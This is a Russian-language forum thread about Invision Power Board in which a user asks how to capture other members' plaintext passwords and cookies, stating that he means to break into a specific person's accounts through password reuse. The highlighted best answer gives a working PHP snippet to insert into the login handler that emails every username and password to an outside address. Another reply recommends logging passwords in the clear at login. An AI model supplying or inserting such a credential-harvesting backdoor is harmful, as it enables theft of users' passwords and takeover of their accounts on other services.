Перейти к содержимому


Фотография
- - - - -

Нужна Помощь с АЦ


Лучший Ответ lowme , 21 Август 2013 - 17:11

Это тебе как пример:


Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.

 

в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:
 

$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);

 

Перейти к сообщению


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 13

#1 Оффлайн   DeViLKIS

    Пользователь


  • Пользователи
  • Репутация
    1
    • Cообщений: 48
    • Форум:3.3.х

Отправлено 21 Август 2013 - 13:27

В общем такие дела, я знаю что многие откажутся помогать мне, но всё же попрошу, мне нужно что бы в АЦ Показывало не только мыло но и пароль т.е все данные которые пользователь вводил при регистрации!
Кто Знает что то подобное помогите, плиз очень нужно срочно..


  • 0

Заработок и обучение заработку

#2 Оффлайн   OriGinaL

    Добрый человек


  • Пользователи
  • Репутация
    276
    • Cообщений: 1 515

Отправлено 21 Август 2013 - 13:28

а что мешает посмотреть через бд ?


  • 0

#3 Оффлайн   DeViLKIS

    Пользователь


  • Пользователи
  • Репутация
    1
    • Cообщений: 48
    • Форум:3.3.х

Отправлено 21 Август 2013 - 13:48

а что мешает посмотреть через бд ?

Не знаю как, хотя думал об этом!


  • 0

#4 Оффлайн   DeViLKIS

    Пользователь


  • Пользователи
  • Репутация
    1
    • Cообщений: 48
    • Форум:3.3.х

Отправлено 21 Август 2013 - 13:53

еще есть зловещая мысль, можно как то сделать что бы "cookie" при переходе на мой сайт, автоматически записывались в txt файл на сайте?
Это уже по сложнее)
извините за такой вопрос(

 


  • 0

#5 Оффлайн   "Js"

    Знающий


  • Пользователи
  • Репутация
    27
    • Cообщений: 623
    • Город:Провинция

Отправлено 21 Август 2013 - 13:55

Тут наверное надо систему писать, чтобы обратно с бд делал расшифровку и показывал в панели.

Навряд ли, кто будет так делать.Хотя за деньги сделаю.

Вообще в бд, тоже все зашифровано.

еще есть зловещая мысль, можно как то сделать что бы "cookie" при переходе на мой сайт, автоматически записывались в txt файл на сайте?
Это уже по сложнее)
извините за такой вопрос(


Вообще я смотрю ты хочешь на халяву пороли и куки воровать...

Такого нет, плати и тебе напишут скрипт.Хотя 99%, что антивирус заблокирует сайт так, как это воровство.
  • 1

#6 Оффлайн   DeViLKIS

    Пользователь


  • Пользователи
  • Репутация
    1
    • Cообщений: 48
    • Форум:3.3.х

Отправлено 21 Август 2013 - 14:01

Тут наверное надо систему писать, чтобы обратно с бд делал расшифровку и показывал в панели.

Навряд ли, кто будет так делать.Хотя за деньги сделаю.

Вообще в бд, тоже все зашифровано.

Вообще я смотрю ты хочешь на халяву пороли и куки воровать...

Такого нет, плати и тебе напишут скрипт.Хотя 99%, что антивирус заблокирует сайт так, как это воровство.

Ну я не хочу как бы масово их воровать, да, это сути не меняет, но всё же скажу что нужно взломать только одного человека которого я знаю даже... ну короче это сложно вреда никому не будет сильного))
как они поступают так и с ними)

YinYang, Скайп есть?
  • 0

#7 Оффлайн   OriGinaL

    Добрый человек


  • Пользователи
  • Репутация
    276
    • Cообщений: 1 515

Отправлено 21 Август 2013 - 14:03

 

но всё же скажу что нужно взломать только одного человека которого я знаю даже... 

 

что мешает поменять его пароль?)


  • 0

#8 Оффлайн   DeViLKIS

    Пользователь


  • Пользователи
  • Репутация
    1
    • Cообщений: 48
    • Форум:3.3.х

Отправлено 21 Август 2013 - 14:06

что мешает поменять его пароль?)

я знаю что большенство людей используют один и тот же пароль везде, ВК, Мейл, Скайп и т.д
вот и мне нужно для этого после реги на моём сайте уже 50 - 70% того что пароль и к остальному подойдет!


  • 0

#9 Оффлайн   "Js"

    Знающий


  • Пользователи
  • Репутация
    27
    • Cообщений: 623
    • Город:Провинция

Отправлено 21 Август 2013 - 14:19

я знаю что большенство людей используют один и тот же пароль везде, ВК, Мейл, Скайп и т.д
вот и мне нужно для этого после реги на моём сайте уже 50 - 70% того что пароль и к остальному подойдет!

 

Скайп в профили, все равно у тебя денег не хватит, чтобы я написал такой скрипт.

 

Зря ты так думаешь, что один пароль везде.


  • 0

#10 Оффлайн   lowme

    Постоялец


  • Пользователи
  • Репутация
    14
    • Cообщений: 226
    • Форум:3.4.х

Отправлено 21 Август 2013 - 17:04

Автор, не ведись, пароль в базе хранится в виде хэша, хэширование идёт с солью. По хэшу пароль не восстанавливается. Узнать его можно только тупым перебором по словарю через сравнение хэшей. Ускоряет сей процесс наличие заранее сгенерированных таблиц хэшей (rainbow tables) и обработка на GPU. Короче, если у чела нормальный пароль, то по хэшу из БД восстанавливать его ты будешь до китайской пасхи.

 

А тебе проще сделать модификацию движка, чтобы при входе пароль писался в открытом виде в файл или БД. Это просто и 100 раз описывалось на хакерских форумах.

 

С хэшами и не заморачивайся.


  • 0